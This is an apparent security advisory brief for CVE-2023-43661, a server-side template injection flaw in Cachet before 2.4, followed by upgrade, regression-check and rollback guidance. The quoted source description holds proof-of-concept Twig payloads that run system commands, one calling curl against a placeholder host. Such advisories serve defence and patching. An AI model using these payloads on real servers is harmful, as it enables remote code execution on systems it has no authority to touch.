Cachet vulnerable to Authenticated Remote Code Execution

CVE-2023-43661GHSA-hv79-p62r-wg3p

What to do

Vendor fix available. Upgrade each affected package to the fixed version on its release line (cachethq/cachet 2.4), redeploy, then verify what is actually installed.

This page has no inventory attached, so it cannot say whether you are affected. A vendor fix is not proof that your deployment is fixed.

Source description

As published by the source; long descriptions are shortened.

Summary A template functionality which allows users to create templates allows them to execute any code on the server during the bad filtration and old twig version. Within /cachet/app/Http/Routes/ApiRoutes.php, and attacker could control template input which is passed to laravel's dispatched handler /cachet/app/Bus/Handlers/Commands/Incident/CreateIncidentCommandHandler.php. If an attacker is able to control this data, they may be able to trigger a server-side template injection vulnerability which can lead to remote code execution. This vulnerability does not exist within the Twig library itself, but exists during the process of the Cachet processing of the data without any filtration. This has been patched in Cachet version 2.4. PoC 1. Log in as a default user (non-admin); 2. Create an incident with name slug1 and with content: {{ ['curl yourhost.com','']|sort('system') }} or with any other content for Remote code execution via the Twig, for instance: {{[0]|reduce('system','curl…

# Patch Next advisory brief: CVE-2023-43661

Advisory: Cachet vulnerable to Authenticated Remote Code Execution
IDs: CVE-2023-43661, GHSA-hv79-p62r-wg3p
Record: https://patchnext.com/advisories/cve-2023-43661 (revision 1, source checked 26 Oct 2026, 14:10 UTC)
Inventory: none attached. This brief comes from a public page and does not say whether any deployment is affected.
Severity: Critical (CVSS 9.1)
Exploitation: no confirmed exploitation recorded. Patch Next confirms exploitation only from CISA KEV.
Vendor response: Vendor fix available; fixed versions by package: cachethq/cachet 2.4. A vendor fix does not mean a deployment is fixed.

## Affected components
- Packagist cachethq/cachet: affected < 2.4; fixed in 2.4

## Suggested inspection (read-only)
- Packagist cachethq/cachet: check the installed version with your package manager.

## Supported action
Upgrade each affected component to a fixed version on its release line. For a transitive dependency, upgrade the parent package or add an override or constraint, then regenerate the lockfile. Redeploy every environment that ran an affected version.

## Required regression checks
- Run the test suite and a production build.
- Exercise the features that depend on cachethq/cachet.
- Repeat the inspection and confirm that only fixed versions remain installed.

## Rollback considerations
- Keep the previous lockfile and deployment artifact. Rolling back reinstates the vulnerable version, so apply any documented mitigation while you fix forward.

## Unresolved questions
- Which deployments run an affected version?
- Exploitation status can change. Check again before lowering the priority.
- Mark the work resolved only after the fixed version is verified in production.

## Sources
- Verified: https://github.com/advisories/GHSA-hv79-p62r-wg3p (GitHub-reviewed advisory GHSA-hv79-p62r-wg3p lists affected ranges: Packagist cachethq/cachet >=0 <2.4)
